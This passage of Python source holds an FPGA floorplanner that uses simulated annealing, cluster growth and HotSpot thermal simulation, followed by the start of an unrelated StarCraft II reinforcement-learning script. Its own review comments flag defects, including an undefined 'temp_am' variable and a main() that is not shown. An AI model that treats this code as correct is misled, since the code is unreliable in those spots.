            json.dump(irl_dict, json_file)
        return IRL
    finally:
        sema_irlgen.release()
# Generate all IRL for leaves of the slicing tree, using multiprocessing
def AllLeavesIRLGen():
    # Generate the IRL of every module (slicing-tree leaf) in parallel with
    # multiprocessing, then read the per-module JSON files the workers wrote
    # back into the leaf_IRL global (results can't be returned directly from
    # separate processes).
    global leaf_IRL
    mod_names = list(module_list)
    os.system('mkdir -p ./output_files/json')
    print('Generating irreducible realization list for all modules')
    process_list = []
    for mod_n in mod_names:
        t = multiprocessing.Process( target = ModuleIRLGen, args = (module_list[mod_n][0], mod_n) )
        process_list.append(t)
    for process in process_list:
        process.start()
    for process in process_list:
        process.join()
    # Collect each worker's output file into the shared cache.
    for mod_n in mod_names:
        with open('./output_files/json/'+mod_n+'_IRL','r') as f:
            new_IRL = json.load(f)
        leaf_IRL.update(new_IRL)
# get IRL for 'V' node(vertical slicing), given (x,y), IRL of left/right child
# returned list: [(IRL of the v node, rectangles of each module which is a descendant of the v node)]
# e.g. [( (1,2,4,4),[('jpeg',(1,2,2,2)),('fir',(3,4,2,2))] ),(...)]
def VGetIRL(x,y,l_IRL, r_IRL):
    # Combine child IRLs for a 'V' (vertical-cut) node anchored at (x, y):
    # the left child occupies (x, y) and the right child starts at x + left_width.
    # Returns [( (x,y,w,h), [(mod_name, rect), ...] ), ...] where the module
    # list covers all descendants of this node.
    v_IRL = [] #return list
    ll_IRL = list(filter(lambda p: p[0][0]==x and p[0][1]==y, l_IRL))
    ll_IRL.sort(key=lambda p: p[0][2]) #sort according to width
    for i in range(len(ll_IRL)):
        l_w = ll_IRL[i][0][2]
        l_h = ll_IRL[i][0][3]
        l_mod_use = ll_IRL[i][1]
        # Previous (narrower) left candidate's height bounds the right child:
        # taller right children would only pair better with that candidate.
        if i == 0:
            l_h1 = alpha*HEIGHT
        else:
            l_h1 = ll_IRL[i-1][0][3]#upperbound for right child's height
        rr_IRL = list(filter(lambda p: p[0][0]==(x+l_w) and p[0][1]==y and p[0][3]<l_h1, r_IRL))
        rr_IRL.sort(key=lambda p: p[0][2])
        for j in range(len(rr_IRL)):
            r_w = rr_IRL[j][0][2]
            r_h = rr_IRL[j][0][3]
            r_mod_use = rr_IRL[j][1]
            w_new = l_w + r_w
            h_new = max(l_h,r_h)
            v_IRL.append( ((x,y,w_new,h_new), l_mod_use + r_mod_use) )
            # Once the right child fits under the left's height, wider right
            # children cannot improve the bounding box — stop.
            if r_h <= l_h:
                break
    return v_IRL
# get IRL for 'H' node(horizontal slicing), given (x,y), left child is at bottom, right child top
def HGetIRL(x,y,l_IRL, r_IRL):
    # Combine child IRLs for an 'H' (horizontal-cut) node anchored at (x, y):
    # the left child sits at the bottom and the right child stacks on top at
    # y + left_height. Same return shape as VGetIRL.
    h_IRL = [] #return list
    ll_IRL = list(filter(lambda p: p[0][0]==x and p[0][1]==y, l_IRL))
    ll_IRL.sort(key=lambda p: p[0][2]) #sort according to width
    for i in range(len(ll_IRL)):
        l_w = ll_IRL[i][0][2]
        l_h = ll_IRL[i][0][3]
        l_mod_use = ll_IRL[i][1]
        # NOTE(review): bound comes from the NEXT (wider) left candidate and
        # the right candidates are walked in reverse, mirroring VGetIRL for
        # the transposed orientation — confirm this asymmetry is intentional.
        if i == len(ll_IRL)-1:
            l_w1 = alpha*WIDTH
        else:
            l_w1 = ll_IRL[i+1][0][2]#upperbound for right child's width
        rr_IRL = list(filter(lambda p: p[0][0]==x and p[0][1]==(y+l_h) and p[0][2]<l_w1, r_IRL))
        rr_IRL.sort(key=lambda p: p[0][2])
        for j in reversed(range(len(rr_IRL))):
            r_w = rr_IRL[j][0][2]
            r_h = rr_IRL[j][0][3]
            r_mod_use = rr_IRL[j][1]
            w_new = max(l_w,r_w)
            h_new = l_h + r_h
            h_IRL.append( ((x,y,w_new,h_new), l_mod_use + r_mod_use) )
            # Stop once the top child is no wider than the bottom child.
            if r_w <= l_w:
                break
    return h_IRL
# usually input the index of root node when call this function, which is always 0.
# Then get IRL for all nodes in the slicing tree
def EvaluateNode(index):
    # Recursively compute the IRL of every node in the global slicing tree
    # (call with the root index, 0). Leaves take the cached/generated module
    # IRL; internal 'V'/'H' nodes combine their children's IRLs at every
    # anchor position. Results are stored on each node's .IRL attribute.
    global leaf_IRL
    # for leaves
    if s_floorplan.slicing_tree[index].l == None and s_floorplan.slicing_tree[index].r == None:
        mod_name = s_floorplan.slicing_tree[index].t
        mod_res = module_list[ mod_name ][0]
        if mod_name in leaf_IRL: #IRL already calculated
            IRL_tmp = leaf_IRL[mod_name]
        else: #leaf_IRL does not have the IRL
            leaf_IRL[mod_name] = ModuleIRLGen(mod_res, mod_name)
            IRL_tmp = leaf_IRL[mod_name]
        # Leaf IRL entries carry the module placement alongside the rectangle.
        s_floorplan.slicing_tree[index].IRL = [ (x,[(mod_name,x)]) for x in IRL_tmp]
        return
    # Internal node: evaluate children first (child fields are 1-based indices).
    EvaluateNode(s_floorplan.slicing_tree[index].l - 1)
    EvaluateNode(s_floorplan.slicing_tree[index].r - 1)
    IRL = []
    left_child_IRL = s_floorplan.slicing_tree[ s_floorplan.slicing_tree[index].l - 1 ].IRL
    right_child_IRL = s_floorplan.slicing_tree[ s_floorplan.slicing_tree[index].r - 1 ].IRL
    if s_floorplan.slicing_tree[index].t == 'V':
        for x in range(int(alpha*WIDTH)):
            for y in range(int(alpha*HEIGHT)):
                IRL += VGetIRL(x,y,left_child_IRL,right_child_IRL)
    elif s_floorplan.slicing_tree[index].t == 'H':
        for x in range(int(alpha*WIDTH)):
            for y in range(int(alpha*HEIGHT)):
                IRL += HGetIRL(x,y,left_child_IRL,right_child_IRL)
    s_floorplan.slicing_tree[index].IRL = IRL
# generate floorplan file for thermal simulator HotSpot
# module_loc_list = [(mod_name1,(x,y,w,h)),(mod_name2..)..], folder is the name of ./hotspot/folder, can be empty string
def FLPgen(module_loc_list,folder):
    """Generate a HotSpot .flp floorplan file.

    module_loc_list = [(mod_name1,(x,y,w,h)),(mod_name2..)..]; folder is the
    name of a ./hotspot/ subdirectory (may be the empty string).
    """
    # Physical size of one grid unit in metres — assumes HotSpot's default
    # unit conventions; TODO confirm against hotspot.config.
    cell_width = 0.0001
    cell_height = 0.0001
    # BUG FIX: use a context manager so the file is closed even if a write raises.
    with open('./hotspot/'+folder+'/'+design_name+'.flp','w') as flp_file:
        flp_file.write('root\t'+str( WIDTH*cell_width )+'\t'+str( HEIGHT*cell_height )+'\t0\t0\n')
        for mod in module_loc_list:
            width = str(mod[1][2]*cell_width)
            height = str(mod[1][3]*cell_height)
            left_x = str(mod[1][0]*cell_width)
            bottom_y = str(mod[1][1]*cell_height)
            flp_file.write(mod[0]+'\t'+width+'\t'+height+'\t'+left_x+'\t'+bottom_y+'\n')
# generate power trace file for thermal simulator HotSpot
# mod_list should have the same format of the module_list in file test.module
def PTRACEgen(mod_list, root_power,folder):
    """Generate a HotSpot .ptrace power-trace file.

    mod_list has the same format as module_list in the .module file;
    root_power is the static power of the whole area in mW (converted to W).
    """
    name = 'root' #first line: block names
    power = str(root_power/1000) #second line: power values in Watts
    for mod in mod_list:
        name += '\t'
        name += mod
        power += '\t'
        power += str( mod_list[mod][1]/1000 ) #unit: Watt
    # BUG FIX: use a context manager so the file is closed even if a write raises.
    with open('./hotspot/'+folder+'/'+design_name+'.ptrace','w') as ptrace_file:
        ptrace_file.write(name+'\n'+power+'\n')
# generate flp and ptrace file from module_list and IRL. root_power is static power of the whole floorplanning area(unit: mW)
# run HotSpot and get thermal map file [design_name].grid.steady as output
def RunHotSpot(module_loc_list, root_power, folder):
    """Write flp/ptrace inputs and run HotSpot, producing [design_name].grid.steady.

    root_power is the static power of the whole floorplanning area (mW).
    Concurrency is throttled by the sema_hotspot semaphore.
    """
    global sema_hotspot
    sema_hotspot.acquire()
    try:
        FLPgen(module_loc_list, folder)
        PTRACEgen(module_list, root_power, folder)
        # BUG FIX: the original command ended with '2>%1', which redirects
        # stderr into a literal file named '%1'; '2>&1' is the intended
        # "stderr to stdout" (both discarded to /dev/null).
        os.system('cd hotspot && ./hotspot -c hotspot.config -f ./'+folder+'/'+design_name+'.flp -p ./'+folder+'/'+design_name+'.ptrace -steady_file ./'+folder+'/'+design_name+'.steady -model_type grid -grid_steady_file ./'+folder+'/'+design_name+'.grid.steady > /dev/null 2>&1')
    finally:
        # BUG FIX: release the semaphore even when HotSpot generation raises.
        sema_hotspot.release()
# read [design_name].grid.steady and return the highest temperature(unit: Kelvin)
def ReadTempMax(folder):
    """Parse [design_name].grid.steady and return the hottest grid temperature (Kelvin)."""
    with open('./hotspot/'+folder+'/'+design_name+'.grid.steady','r') as thermal_map:
        contents = thermal_map.read()
    # NOTE(review): the pattern only matches NNN.NN values — readings outside
    # that format (e.g. below 100 K) would be silently skipped; confirm the
    # HotSpot output format guarantees three integer digits.
    readings = re.findall(r'\d{3}\.\d{2}', contents)
    return max(map(float, readings))
# given the location of every module[(mod_name,(x,y,w,h)),(..).], return total interconnection wire length = sum( Manhattan distance between block centers)
def TotalWireLen(module_loc_list):
    """Return total interconnect wire length for a placement.

    module_loc_list = [(mod_name,(x,y,w,h)), ...]. Wire length is the sum of
    wire_count * Manhattan distance between the centers of connected blocks.
    """
    mod_loc_dict = {}
    # read the list into a dict, and only store the center location
    for mod_name, rect in module_loc_list:
        x, y, w, h = rect
        # BUG FIX: the center y-coordinate was previously computed as
        # w + h/2 (width instead of the y origin); it must be y + h/2.
        mod_loc_dict[mod_name] = (x + w/2, y + h/2)
    wl_sum = 0
    for mod in module_list: #module_list is the global variable in .module file_name
        center1 = mod_loc_dict[mod]
        for other_mod in module_list[mod][2]:
            center2 = mod_loc_dict[other_mod]
            wire_num = module_list[mod][2][other_mod]
            wl_sum += wire_num * ( abs(center1[0]-center2[0]) + abs(center1[1]-center2[1]) )
    wl_sum = wl_sum/2 #each connection counted once from each endpoint above
    return wl_sum
# given the location of every module[(mod_name,(x,y,w,h)),(..).], return aspect ratio sum = sum( longer side length/shorter side length of all blocks), this a metric for internal wire length
def RatioSum(module_loc_list):
    """Sum each block's aspect ratio (long side / short side) — a proxy for internal wire length.

    module_loc_list = [(mod_name,(x,y,w,h)), ...].
    """
    total = 0
    for _, rect in module_loc_list:
        w, h = rect[2], rect[3]
        total += w/h if w >= h else h/w
    return total
# floorplanning algorithm based on Simulated Annealing
def FloorplaningSA():
    """Search slicing-tree floorplans with Simulated Annealing.

    Relies on module-level state: ``module_list`` (netlist), ``leaf_IRL``
    (per-module realizable rectangles), ``s_floorplan`` (current slicing
    tree), ``history_record`` (memo: Polish expression -> cost) and
    ``final_result`` (serialized to JSON at the end).
    Returns the best placement list, or None when nothing feasible is found.
    """
    global s_floorplan
    global leaf_IRL
    global history_record
    global final_result
    # acceptance probability: > 1 for an improving move, else exp(-delta/T)
    def accept_prob(old_cost, new_cost, T):
        return numpy.exp( (old_cost-new_cost)/T )
    # cost function, area_ex - area exceeds WIDTH*HEIGHT, temp_max - max temperature(in Kelvin), tot_wl - total external interconnection wire length, tot_ap - aspect ratio sum of all modules
    # aaa/bbb/ccc are global weights; exceeded area acts as a penalty multiplier.
    def cost_func(area_ex, temp_max, tot_ap, tot_wl):
        # NOTE(review): the doubled "cost = cost =" target is redundant but
        # harmless -- left untouched here.
        cost = cost = ( aaa*temp_max + bbb*tot_ap + ccc*tot_wl ) * ( 0.2*area_ex/(WIDTH*HEIGHT) + 1)
        return cost
    # calculate IRL of root node: evaluate the current slicing tree, run
    # HotSpot on every realization that fits, memoize and return the best cost.
    def new_floorplan():
        global s_floorplan
        global history_record
        nonlocal max_tp
        nonlocal best_cost
        nonlocal best_fp
        nonlocal best_temp_max
        # if the slicing tree is evaluated before, reuse the memoized cost
        cur_polish = ' '.join( s_floorplan.Polish() )
        if cur_polish in history_record:
            return history_record[cur_polish]
        # slicing tree not evaluated before
        EvaluateNode(0)
        # one flag per root realization: does it fit inside WIDTH x HEIGHT?
        useful_floorplan = list(map(lambda p: (p[0][0]+p[0][2])<=WIDTH and (p[0][1]+p[0][3])<=HEIGHT, s_floorplan.slicing_tree[0].IRL))
        if s_floorplan.slicing_tree[0].IRL:
            ex_root_area = [] # area exceeds WIDTH*HEIGHT
            thread_list = [] # multithreading for RunHotSpot
            temp_max_list = [] # maximal temperature from HotSpot
            total_ratio = [] # aspect ratio sum of all modules
            total_wirelen = [] # total length of external interconnection wire between modules
            cost_list = []
            for IR in s_floorplan.slicing_tree[0].IRL:
                # Area sticking out of the chip outline, split by which side(s) overflow.
                if (IR[0][0]+IR[0][2] > WIDTH) and (IR[0][1]+IR[0][3] <= HEIGHT):
                    area_exceed = IR[0][3] * (IR[0][0]+IR[0][2]-WIDTH)
                elif (IR[0][0]+IR[0][2] <= WIDTH) and (IR[0][1]+IR[0][3] > HEIGHT):
                    area_exceed = IR[0][2] * (IR[0][1]+IR[0][3]-HEIGHT)
                elif (IR[0][0]+IR[0][2] > WIDTH) and (IR[0][1]+IR[0][3] > HEIGHT):
                    area_exceed = IR[0][2]*IR[0][3] - (WIDTH-IR[0][0])*(HEIGHT-IR[0][1])
                else:
                    area_exceed = 0
                ex_root_area.append(area_exceed)
                total_wirelen.append( TotalWireLen(IR[1]) )
                total_ratio.append( RatioSum(IR[1]) )
                # Each realization gets its own HotSpot working directory.
                cur_index = s_floorplan.slicing_tree[0].IRL.index(IR)
                os.system('mkdir -p ./hotspot/'+str(cur_index))
                # Only simulate floorplans that actually fit on the chip.
                if area_exceed == 0:
                    t = threading.Thread( target = RunHotSpot, args = (IR[1],0,str(cur_index)) )
                    thread_list.append(t)
            for thread in thread_list:
                thread.start()
            for thread in thread_list:
                thread.join()
            # Collect per-realization peak temperatures; non-fitting plans get
            # a pessimistic placeholder (hottest seen so far, or 315 K).
            for i in range(len(useful_floorplan)):
                if useful_floorplan[i] == True:
                    t_max = ReadTempMax(str(i))
                    if t_max > max_tp:
                        max_tp = t_max
                    temp_max_list.append(t_max)
                else:
                    if max_tp == 0:
                        temp_max_list.append(315)
                    else:
                        temp_max_list.append(max_tp)
            for i in range(len(temp_max_list)):
                cur_max_temp = temp_max_list[i]
                area_exceed = ex_root_area[i]
                ratio_sum = total_ratio[i]
                wire_length = total_wirelen[i]
                cost_list.append( cost_func(area_exceed, cur_max_temp, ratio_sum, wire_length) )
            cost = min(cost_list)
        else:
            # No realization at all: sentinel cost (999 also means "infeasible").
            cost = 999
        if 1 in useful_floorplan: #if there is floorplan fits the real maximum area
            for i, useful in enumerate(useful_floorplan):
                if useful == True:
                    real_cost = cost_list[i]
                    # Track the globally best *fitting* floorplan seen so far.
                    if real_cost < best_cost:
                        best_cost = real_cost
                        best_temp_max = temp_max_list[i]
                        best_fp = s_floorplan.slicing_tree[0].IRL[i]
        history_record[cur_polish] = cost
        return cost
    mod_names = list(module_list)
    # generate IRL for leaves (modules)
    AllLeavesIRLGen()
    s_floorplan = STree(mod_names) #random slicing tree, nodes have (t,p,l,r), no (x,y,w,h)
    print(s_floorplan)#for debug
    polish_exp = ' '.join( s_floorplan.Polish() )
    print('0.Polish Expression: '+polish_exp)
    max_tp = 0
    # s_floorplan.M3()
    best_cost = 999
    # NOTE(review): 'temp_am' is not defined anywhere in the visible portion of
    # this file -- looks like a typo (temp_max?); confirm against the full file.
    best_temp_max = temp_am
    best_fp = ()
    T = 1.0 # temperature
    T_min = 0.005
    coeff = 0.8  # cooling factor per outer iteration
    print('Simulated Anealing started. Starting with T = '+str(T)+', will be stopped when T < '+str(T_min)+' or 2 consecutive temperature without cost improvement')
    old_cost = new_floorplan()
    max_inner_iter = 20
    nobetter_t_count = 0
    while T > T_min:
        old_best_cost = best_cost
        inner_iter_count = 0
        nojump_count = 0
        while inner_iter_count < max_inner_iter:
            inner_iter_count += 1
            s_floorplan.ClearIRL()
            # Keep a copy so a rejected move can be rolled back.
            tmp_tree = copy.deepcopy( s_floorplan.slicing_tree )
            # Random perturbation: M1/M2/M3 tree moves; fall back to M1 if M3 fails.
            select = random.randint(0,2)
            if select == 0:
                s_floorplan.M1()
            elif select == 1:
                s_floorplan.M2()
            else:
                if not s_floorplan.M3():
                    s_floorplan.M1()
            new_cost = new_floorplan()
            ap = accept_prob(old_cost, new_cost, T)
            if ap > random.random():
                old_cost = new_cost
                nojump_count = 0
            else:
                s_floorplan.slicing_tree = copy.deepcopy( tmp_tree ) #recover the original tree
                nojump_count += 1
                # Three consecutive rejections end this temperature early.
                if nojump_count >= 3:
                    break
        T = T*coeff
        print(inner_iter_count,'floorplan evaluated, T =', T)
        print('So far, best cost found = '+str(best_cost)+' , best floorplan: '+str(best_fp))
        if best_cost == old_best_cost:
            nobetter_t_count += 1
        else:
            nobetter_t_count =0
        # Stop after 2 temperatures without improvement (once feasible).
        if nobetter_t_count >= 2 and best_cost != 999:
            break
    # draw result
    if best_cost == 999:
        print('No feasible floorplan found')
        with open('./output_files/json/final_result','w') as json_file:
            json.dump(final_result, json_file)
        return
    else:
        print('best floorplan: '+str(best_fp))
        modules = best_fp[1]
        final_result = [best_temp_max, modules]
        with open('./output_files/json/final_result','w') as json_file:
            json.dump(final_result, json_file)
        DrawFloorplan('./output_files/'+design_name+'_floorplan_sa.svg',modules)
        DrawThermalMap('./output_files/'+design_name+'_thermal_map_sa.svg',modules, 0)
        return modules
# check if module1 [x1,y1,w1,h1] overlap with module2 [x2,y2,w2,h2]
def CheckOverlapMod(module1, module2):
    """Axis-aligned rectangle intersection test; touching edges do NOT count."""
    x1, y1, w1, h1 = module1
    x2, y2, w2, h2 = module2
    # The rectangles are disjoint iff one lies entirely to the left of,
    # right of, above, or below the other (De Morgan of the overlap test).
    separated = (
        x1 >= x2 + w2 or x2 >= x1 + w1 or
        y1 >= y2 + h2 or y2 >= y1 + h1
    )
    return not separated
# check if new_module [x,y,w,h] overlap with modules in floorplan [['name',[x,y,w,h]],[..],..]
def CheckOverlap(floorplan, new_module):
    """True when new_module collides with at least one already-placed module."""
    return any(CheckOverlapMod(placed[1], new_module) for placed in floorplan)
# floorplan format: [['name',[x,y,w,h]],[..],..]
def BoundingArea(floorplan):
    """Area of the smallest origin-anchored rectangle enclosing all modules."""
    width = 0
    height = 0
    for _, (x, y, w, h) in floorplan:
        width = max(width, x + w)
        height = max(height, y + h)
    return width * height
# Euclidean distance of the centers of two modules, module format:[x,y,w,h]
def EuclideanDist(module1, module2):
    """Straight-line distance between the center points of two blocks."""
    dx = (module1[0] + module1[2] / 2) - (module2[0] + module2[2] / 2)
    dy = (module1[1] + module1[3] / 2) - (module2[1] + module2[3] / 2)
    return (dx * dx + dy * dy) ** 0.5
# module format: ['name',[x,y,w,h]]
def PowerDensity(module):
    # Power drawn by this module, looked up in the global module_list table
    # (module_list[name][1] holds the power figure read from the .module file).
    power = module_list[module[0]][1]
    # Footprint area in placement units; assumes w and h are non-zero.
    area = module[1][2]*module[1][3]
    return power/area
# floorplanning algorithm based on (modified) cluster growth
def FloorplaningMCG():
    """Greedy cluster-growth floorplanner.

    Tries every module as the linear-ordering seed, places modules one by one
    at their cheapest non-overlapping location, simulates each completed
    floorplan with HotSpot and keeps the one with the lowest peak temperature.
    Reads module-level state: ``module_list``, ``leaf_IRL``, ``WIDTH``/
    ``HEIGHT`` and the mcg_* weights; writes ``final_result`` plus SVG/JSON
    output files.  Returns the chosen placement list, or None when nothing
    feasible exists.
    """
    global alpha, final_result
    alpha = 1
    # Cost of putting the current module at location ``module`` = [x,y,w,h]:
    # inf when it overlaps something already placed, otherwise a weighted sum
    # of the normalized bounding area and a thermal-affinity term that keeps
    # blocks with similar power density further apart.
    def cost_func(module):
        if CheckOverlap(floorplan_mcg, module):
            cost = float('inf')
        else:
            new_floorplan = floorplan_mcg + [['new_module',module]]
            bound = BoundingArea(new_floorplan)
            b_area_norm = bound/(WIDTH*HEIGHT) #normalized bounding area
            power_density = PowerDensity([current_mod_name,module])
            mod_area_self = module[2]*module[3]
            second_term_sum = 0
            for mod in floorplan_mcg:
                mod_area = mod[1][2] * mod[1][3]
                dist = EuclideanDist(module,mod[1])
                other_power_density = PowerDensity(mod)
                pd_diff = abs(power_density - other_power_density)
                second_term_sum += (mod_area*mod_area_self)**0.5 /(dist * (pd_diff+mcg_const))
            cost = mcg_alpha*b_area_norm + mcg_beta*second_term_sum
        return cost
    # Connectivity-gain linear ordering; the first module to place is the seed.
    def LinearOrdering(first_mod_name):
        module_order = [first_mod_name]
        mod_list = list(module_list)
        gain_list = [0]*len(mod_list)
        unselected_list = [True]*len(mod_list)
        selected_index = mod_list.index(module_order[-1])
        unselected_list[selected_index] = False
        for i,mod in enumerate(mod_list):
            for other_mod in module_list[mod][2]:
                gain_list[i] -= module_list[mod][2][other_mod] #new nets
        while True in unselected_list:
            net_dict = module_list[ module_order[-1] ][2]
            for mod in net_dict:
                mod_index = mod_list.index(mod)
                gain_list[mod_index] += net_dict[mod] #nets going to be terminated
            remaining_mods = list( itertools.compress(mod_list,unselected_list) )
            remaining_gains = list( itertools.compress(gain_list,unselected_list) )
            module_order.append( remaining_mods[ remaining_gains.index( max(remaining_gains) ) ] )
            selected_index = mod_list.index(module_order[-1])
            unselected_list[selected_index] = False
        return module_order
    os.system('mkdir -p ./hotspot/mcg')
    # generate IRL for leaves (modules), generate leaf_IRL:{'fir':[[x,y,w,h]..],...}
    AllLeavesIRLGen()
    floorplan_list = []
    max_temp_list = []
    # BUG FIX: defined before the loop so the feasibility check below cannot
    # hit an unbound name when module_list is empty.
    mcg_success = False
    for module_n in list(module_list):
        module_order = LinearOrdering(module_n)
        print('order:',module_order)
        floorplan_mcg = [] # in format [['name',[x,y,w,h]],[..],..]
        mcg_success = True
        for mod_name in module_order:
            mod_location_list = leaf_IRL[mod_name]
            current_mod_name = mod_name
            mod_cost_list = list( map(cost_func,mod_location_list) )
            min_cost_ind = mod_cost_list.index( min(mod_cost_list) )
            # BUG FIX: previously this compared the *index* to infinity (always
            # true), so a module whose every candidate location overlapped was
            # still "placed".  Compare the best cost itself instead.
            if mod_cost_list[min_cost_ind] != float('inf'):
                min_cost_location = mod_location_list[min_cost_ind]
                floorplan_mcg.append([mod_name,min_cost_location])
                print(mod_name,'placed')
            else:
                mcg_success = False
                break
        if mcg_success == True:
            print('succeed')
            floorplan_list.append(copy.deepcopy(floorplan_mcg))
            RunHotSpot(floorplan_mcg, 0, 'mcg')
            cur_max_temp = ReadTempMax('mcg')
            max_temp_list.append(cur_max_temp)
    # draw result
    # BUG FIX: feasibility was previously judged from the *last* seed's flag
    # only; any completed floorplan collected above counts as success.
    if not floorplan_list:
        print('No feasible floorplan found')
        with open('./output_files/json/final_result','w') as json_file:
            json.dump(final_result, json_file)
        return
    else:
        # keep the floorplan with the lowest peak temperature
        floorplan_mcg = copy.deepcopy( floorplan_list[max_temp_list.index( min(max_temp_list) )] )
        print('best floorplan:',floorplan_mcg)
        os.system('mkdir -p ./hotspot/mcg')
        DrawThermalMap('./output_files/'+design_name+'_thermal_map_mcg.svg',floorplan_mcg, 0)
        temp_max = ReadTempMax('')
        final_result = [temp_max, floorplan_mcg]
        with open('./output_files/json/final_result','w') as json_file:
            json.dump(final_result, json_file)
        DrawFloorplan('./output_files/'+design_name+'_floorplan_mcg.svg',floorplan_mcg)
        return floorplan_mcg
def DrawFloorplan(svg_name, modules):
    """Render the floorplan (resource legend + fixed cells + modules) to SVG.

    svg_name: output path; modules: [['name',[x,y,w,h]], ...] placement.
    Reads globals: colormap, resource, res_cells, WIDTH, HEIGHT.
    """
    global colormap
    cell_width = 10  # pixels per placement cell
    cell_spacing = 4  # pixel gap between cells
    label_spacing = 60  # horizontal spacing between legend entries
    label_spacing_to_floorplan = 30  # gap between floorplan and legend row
    # draw resource labels (legend below the floorplan)
    dr = svgwrite.Drawing(svg_name,profile='tiny')
    i = 0
    for cur_r in list(resource):
        if cur_r not in colormap:
            # NOTE(review): this stores the literal *source text*
            # 'svgwrite.rgb(...)' as the fill value, not an evaluated color --
            # confirm whether an actual svgwrite.rgb() call was intended.
            colormap[cur_r] = 'svgwrite.rgb('+str(random.randint(128,255))+','+str(random.randint(128,255))+','+str(random.randint(128,255))+',"%")'
        dr.add(dr.rect(insert=(i*label_spacing+10, HEIGHT*(cell_width+cell_spacing)+label_spacing_to_floorplan-(resource[cur_r][1]-1)*cell_width),size=(resource[cur_r][0]*cell_width,resource[cur_r][1]*cell_width),stroke='gray',fill=colormap[cur_r]))
        dr.add(dr.text(cur_r,insert=(i*label_spacing+15+resource[cur_r][0]*cell_width, HEIGHT*(cell_width+cell_spacing)+label_spacing_to_floorplan+10)))
        i = i+1
    # draw empty floorplan (chip outline)
    dr.add(dr.rect(insert=(0,0),size=(cell_width*WIDTH+cell_spacing*(WIDTH+1),cell_width*HEIGHT+cell_spacing*(HEIGHT+1)),stroke='orange',fill='white'))
    # draw the fixed resource cells; SVG's y axis grows downward, hence the
    # HEIGHT-... flips in the y coordinates below
    for cell in res_cells:
        if cell[0] not in resource:
            print('Error: unknown resource in resource file')
            sys.exit(1)
        cwidth = resource[cell[0]][0] #width in number of width of a LAB
        cheight = resource[cell[0]][1]
        initial_x = cell[1]*cell_width + (cell[1]+1)*cell_spacing #coordinate of top right corner
        initial_y = (HEIGHT-cell[2]-cheight)*cell_width + (HEIGHT-cell[2]-cheight+1)*cell_spacing
        rwidth = cwidth*cell_width + (cwidth-1)*cell_spacing #width on the graph drawn (in pixel)
        rheight = cheight*cell_width + (cheight-1)*cell_spacing
        ccolor = colormap[cell[0]]
        dr.add(dr.rect(insert=(initial_x,initial_y),size=(rwidth,rheight),stroke='gray',fill=ccolor))
    # draw modules (outlined rectangles labelled with their names)
    for mod in modules:
        mod_name = mod[0]
        mx = mod[1][0]
        my = mod[1][1]
        mw = mod[1][2]
        mh = mod[1][3]
        initial_x = mx*cell_width +(mx+0.5)*cell_spacing
        initial_y = (HEIGHT-my-mh)*cell_width + (HEIGHT-my-mh+0.5)*cell_spacing
        rwidth = mw*cell_width + mw*cell_spacing
        rheight = mh*cell_width + mh*cell_spacing
        dr.add(dr.rect(insert=(initial_x,initial_y),size=(rwidth,rheight),stroke='black',fill='white'))
        dr.add(dr.text(mod_name,insert=(initial_x,initial_y+20)))
    dr.save()
def DrawThermalMap(file_name,module_loc_list, root_power):
    # Run the HotSpot thermal simulation for this placement (outputs land in
    # ./hotspot), then render its steady-state grid to an SVG via the bundled
    # perl script; file_name is relative to the project root ('../' from hotspot/).
    RunHotSpot(module_loc_list, root_power, '')
    os.system('cd hotspot && ./grid_thermal_map.pl '+design_name+'.flp '+design_name+'.grid.steady > ../'+file_name)
design_name = 'test' #default
if __name__ == "__main__":
    # Parse command-line arguments; presumably updates design_name and other
    # globals -- confirm against SetGlobalVar's definition.
    SetGlobalVar(sys.argv[1:])
    resource_file = "./"+ design_name +".res"
    module_file = "./"+ design_name +".module"
    # SECURITY NOTE: exec() runs the .res/.module files as arbitrary Python --
    # only feed trusted design files to this tool.
    exec(open(resource_file).read())
    exec(open(module_file).read())
    # throttle concurrent HotSpot runs / IRL-generation processes
    sema_hotspot = threading.Semaphore(value = PROCESS_MAX )
    sema_irlgen = multiprocessing.Semaphore(PROCESS_MAX)
# NOTE(review): duplicate __main__ guard; main() is not defined in the visible
# portion of this file -- confirm it exists elsewhere.
if __name__ == "__main__":
    main()
|
clone_five_eval_mini_srcgame_add_map_bn.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "4,5"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_add_map_bn as mini_source_agent
from mini_network_add_map_bn import MiniNetwork
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
# 20200825-101942_mini
# 20200828-160609_source
flags.DEFINE_string("restore_model_path", "./model/20200901-213813_mini/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)")
